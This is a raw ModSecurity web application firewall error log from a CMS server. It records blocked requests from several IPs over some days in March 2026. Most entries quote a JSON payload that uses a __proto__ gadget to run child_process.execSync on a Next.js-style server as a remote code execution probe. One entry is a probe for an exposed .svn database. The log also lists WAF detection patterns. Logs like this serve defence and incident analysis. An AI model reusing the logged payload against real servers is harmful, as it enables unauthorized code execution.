[tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aasLZAeN8XtnchGP78q7DgAAAQM"] [Fri Mar 06 21:11:01.890549 2026] [:error] [pid 8674:tid 8736] [client 35.78.124.56:43710] [client 35.78.124.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aasmxdT_vzNo4RN6lvBaNgAAAIs"] [Fri Mar 06 21:11:02.112002 2026] [:error] [pid 8674:tid 8740] [client 35.78.124.56:43710] [client 35.78.124.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aasmxtT_vzNo4RN6lvBaNwAAAI0"] [Fri Mar 06 21:11:02.339838 2026] [:error] [pid 8674:tid 8752] [client 35.78.124.56:43710] [client 35.78.124.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aasmxtT_vzNo4RN6lvBaOAAAAJM"] [Sat Mar 07 01:19:41.894618 2026] [:error] [pid 8997:tid 9031] [client 13.42.40.55:36538] [client 13.42.40.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aathDfysXjZlE98Wt8zwTQAAANc"] [Sat Mar 07 01:19:41.908415 2026] [:error] [pid 8997:tid 9014] [client 13.42.40.55:36538] [client 13.42.40.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aathDfysXjZlE98Wt8zwTgAAAMY"] [Sat Mar 07 01:19:41.925833 2026] [:error] [pid 8997:tid 9019] [client 13.42.40.55:36538] [client 13.42.40.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aathDfysXjZlE98Wt8zwTwAAAMs"] [Sat Mar 07 20:21:03.881442 2026] [:error] [pid 15179:tid 15323] [client 54.79.181.172:46894] [client 54.79.181.172] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaxsj_YlssblAr8C5aKuVwAAARY"] [Sat Mar 07 20:21:04.169505 2026] [:error] [pid 15179:tid 15264] [client 54.79.181.172:46894] [client 54.79.181.172] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaxskPYlssblAr8C5aKuWQAAAQQ"] [Sat Mar 07 20:21:04.463263 2026] [:error] [pid 15179:tid 15295] [client 54.79.181.172:46894] [client 54.79.181.172] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaxskPYlssblAr8C5aKuWwAAAQ4"] [Sun Mar 08 23:47:41.661728 2026] [:error] [pid 13605:tid 13631] [client 3.109.153.205:44998] [client 3.109.153.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aa3ufTLobmDOvyRcAEitcQAAANg"] [Sun Mar 08 23:47:41.798475 2026] [:error] [pid 13605:tid 13608] [client 3.109.153.205:44998] [client 3.109.153.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aa3ufTLobmDOvyRcAEitcgAAAME"] [Sun Mar 08 23:47:41.940276 2026] [:error] [pid 13605:tid 13623] [client 3.109.153.205:44998] [client 3.109.153.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aa3ufTLobmDOvyRcAEitcwAAANA"] [Tue Mar 10 13:59:45.554494 2026] [:error] [pid 28726:tid 28739] [client 52.66.26.84:47212] [client 52.66.26.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abAHsbrm3fD64nkDJhIbwwAAAQA"] [Tue Mar 10 13:59:45.694356 2026] [:error] [pid 28726:tid 28746] [client 52.66.26.84:47212] [client 52.66.26.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abAHsbrm3fD64nkDJhIbxQAAAQc"] [Tue Mar 10 13:59:45.839616 2026] [:error] [pid 28726:tid 28751] [client 52.66.26.84:47212] [client 52.66.26.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abAHsbrm3fD64nkDJhIbxwAAAQw"] [Tue Mar 10 17:57:12.090030 2026] [:error] [pid 8091:tid 8116] [client 45.148.10.160:59564] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/.svn/wc.db"] [unique_id "abA_WPMmESTk3DzpxpPF9gAAAVY"] [Wed Mar 11 00:27:44.062720 2026] [:error] [pid 10026:tid 10030] [client 54.180.255.94:39566] [client 54.180.255.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abCa4HcalDvAPD3jRjIh5gAAAMI"] [Wed Mar 11 00:27:44.289951 2026] [:error] [pid 10026:tid 10044] [client 54.180.255.94:39566] [client 54.180.255.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abCa4HcalDvAPD3jRjIh6AAAANA"] [Wed Mar 11 00:27:44.531647 2026] [:error] [pid 10026:tid 10036] [client 54.180.255.94:39566] [client 54.180.255.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.assign(new Error('NEXT_REDIRECT') found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22throw Object.ass..."] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "abCa4HcalDvAPD3jRjIh6wAAAMg"] [Wed Mar 11 02:15:33.798397 2026] [:error] [pid 8198:tid 8223] [client 15.134.136.147:40760] [client 15.134.136.147] ModSecurity: Access denied 